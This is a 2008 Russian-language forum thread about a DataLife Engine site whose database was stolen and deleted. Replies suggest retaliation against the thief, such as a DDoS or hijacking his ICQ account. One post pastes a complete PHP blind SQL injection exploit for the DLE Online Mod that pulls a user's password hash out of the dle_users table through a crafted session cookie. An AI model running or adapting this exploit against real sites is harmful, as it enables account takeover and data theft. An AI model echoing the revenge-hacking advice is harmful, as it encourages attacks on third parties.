[help] Слили базу и удолили

Тема в разделе "DLE", создана пользователем index111, 8 июл 2008.

Информация :
Актуальная версия DataLife Engine 12.0
( Final Release v.12.0 | Скачать DataLife Engine | Скачать 12.0 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.3 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. index111

    index111

    Регистр.:
    21 окт 2007
    Сообщения:
    533
    Симпатии:
    77
    Слили у друга с сайта БД и удолили, написали нужна база стучи в аську 4855587, нулл от мида был, как можно этому кто базу слил и удолил под насрать??:mad::bc:
     
  2. GauraStyle

    GauraStyle Kot

    Регистр.:
    13 фев 2007
    Сообщения:
    1.500
    Симпатии:
    920
    Ну можно ддос устроить. Кстати есть такой чел, который ща ломает все ДЛЕ под себя, он раньше тут тусовался. Пока нуллед его незабанил пожизнено. Там тема о нём подымалася. ща он ломает ДЛЕшки и бывает ставит на свой сайт редирект, ну а вот по поводу слитой базы ещё не слышал. Ну можно аську попробывать его ломонуть. Ну а так как можно то ещё ему насолить. Я посмотрел, вроде не тот чел, хотя аську купить можно или другую зарегить и всё. Ну а в остальном, базу можно лиш через хост удалить. Так что проблемы хостера, пароли по ФТП ушли в никуда, менять их нужно. Могли слить через хостера или хостер сам решил бабла подмутить, делов то. Вот так вот.
    Вариантов куча, тут разбираться нужно и очень хорошо.
    :confused:
     
  3. eargon

    eargon

    Регистр.:
    5 дек 2007
    Сообщения:
    181
    Симпатии:
    9
    А пароли он не хранит в таких программах как Total Commander? Есть вирус который тырит эти пароли, у меня такое было не 1 раз.
     
  4. Slim999

    Slim999 Постоялец

    Регистр.:
    15 дек 2006
    Сообщения:
    51
    Симпатии:
    4
    Если хостинг был платный, то у хостеров обычно ежедневный бэкап делается, сделайте запрос на восстановление базы.

    PS: я когда ушёл от хостинга robo-host.ru, у меня тоже кто-то базу утянул (грешу на самих хостеров), кто-то из них просто базу поднял и домен зарегал, удалил меня из админов, НО забыл удалить Журналистов, я когда случайно наткнулся на зеркало своего портала - попросил жруналистов войти и удалить свои новости + разместить на главной новости матерного характера с обвинениями админа в воровстве. Журналисты новости поудаляли свои, админ удалил всякую бяку которую они там написали на главной + и журналистов кильнул (востановил опять базу)
    Во тоже думаю как бы ему ещё чёнить сделать... :mad:
     
  5. GauraStyle

    GauraStyle Kot

    Регистр.:
    13 фев 2007
    Сообщения:
    1.500
    Симпатии:
    920
    А что делать. Писать жалобу руководству или звонить и всё. Думаю обвинения на лицо. Что тут думать и гадать. Когда действительно такое может произойти с каждым.
    :confused:
     
  6. index111

    index111

    Регистр.:
    21 окт 2007
    Сообщения:
    533
    Симпатии:
    77
    Как саму ДЛЕ можно оградить от взлома...:bc:

    PHP:
    <?php
    /* vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: */

    /**
    * DataLifeEngine Online Mod Exploit Blind SQL Injection. Found by Maxster
    * Need magic_quotes_gpc off and mysql version higher than 4.0 (on server)
    *
    * Useful: email, password, name
    *
    * PHP versions 4 and 5
    *
    * LICENSE: This source file is subject to version 3.0 of the PHP license
    * that is available through the world-wide-web at the following URI:
    * http://www.php.net/license/3_0.txt.  If you did not receive a copy of
    * the PHP License and are unable to obtain it through the web, please
    * send a note to license@php.net so we can mail you a copy immediately.
    *
    * @category   Exploit
    * @package    None
    * @author     Anonumous
    * @copyright  2008 (c)
    * @license    http://www.php.net/license/3_0.txt  PHP License 3.0
    * @version    CVS: $Id:$
    * @link        
    * @since      File available since Release 0x00
    */
    set_time_limit(0);

    ?>

    <html>

        <head>
            <title>DataLifeEngine Online Mod Exploit Blind SQL Injection</title>
            <style type="text/css">
                body{
                    font-family: Tahoma;
                    font-size: 12px;
                    color: #e1e1e1;
                    background-color: #222;
                }
            </style>
        </head>
        
        <body>
            <center>
            <form method="post" action="<?php echo $_SERVER['SCRIPT_NAME']?>">
                <input type="text" name="server" value="http://localhost/upload/" />
                <br/><br/>
                <input type="text" name="userid" value="1" />
                <br/><br/>
                <input type="submit" />
            </form>
            </center>
        </body>

    </html>

    <?php
    if (!empty($_POST))
    {
        
    $_    create_function('$error''die("$error");');
        
    $userid     = isset($_POST['userid']) ? (int) $_POST['userid'] : null;
        
    $server        = isset($_POST['server']) ? $_POST['server'] : null;
        
    $alphabet   = array('a''b''c''d''e''f''1''2''3''4''5''6''7''8''9''0');
        
    $responce     null;
        
    $password    null;
        
    $curpos        1;
        
    $alppos     0;
        
    $flag       false;
        
        
        
    $pathinfo parse_url($server);
        if (
    false === is_array($pathinfo) or empty($pathinfo['host'])) {
            
    $_('invalid url');
        } else {
            
    $fsocket fsockopen($pathinfo['host'], 80) or
                
    $_('hostname is dead');
            
    $request "GET {$pathinfo['path']} HTTP/1.1\r\n"
                     
    "Host: {$pathinfo['host']}\r\n"
                     
    "Cookie: dle_onl_session='underWHAT?!\r\n\r\n";
            
    fwrite($fsocket$request) or
                
    $_ ('failed to write data to socket');
            while (
    false === feof($fsocket)){
                
    $responce .= fread($fsocket1024);
            }
            if (
    strpos($responce'MySQL Error') > 0){
                while (
    strlen($password) < 32)
                {
                    
    $fsocket fsockopen($pathinfo['host'], 80) or
                        
    $_('hostname is dead');
                    
    $responce null;
                    
    $cookie   "' or 1=if(substring((select password from dle_users where user_id = $userid),$curpos,1)='{$alphabet[$alppos]}',1,(select 1 union select 3))/*";
                    
    $request  "GET {$pathinfo['path']} HTTP/1.1\r\n"
                               
    "Host: {$pathinfo['host']}\r\n"
                               
    "Connection: close\r\n"
                               
    "Cookie: dle_onl_session=$cookie\r\n\r\n";
                    
    fwrite($fsocket$request) or
                        
    $_ ('failed to write data to socket');
                    while (
    $flag === false){
                        
    $responce .= fread($fsocket128);
                        
    $flag strpos($responce'</html>') ? truefalse;
                    }
                    if (!
    strpos($responce'Subquery returns more than 1 row')){
                        
    $password .= $alphabet[$alppos];
                        
    $curpos += 1;
                        
    $alppos 0;
                    } else {
                        
    $alppos += 1;
                    }
                    
    $flag     false;
                    
    $responce null;
                    
    fclose($fsocket);
                }
            }
            echo 
    "<center><h1>$password</h1></center>";                             
        }
    }

      
    ?>
     
  7. GauraStyle

    GauraStyle Kot

    Регистр.:
    13 фев 2007
    Сообщения:
    1.500
    Симпатии:
    920
    ЭЭЭЭЭЭЭМММ. Чёто вникал, но так и не понял что оно такое и зачем нужно. Если нужно, то как и куда его пихать и что оно даст.
    :nezn:
     
Статус темы:
Закрыта.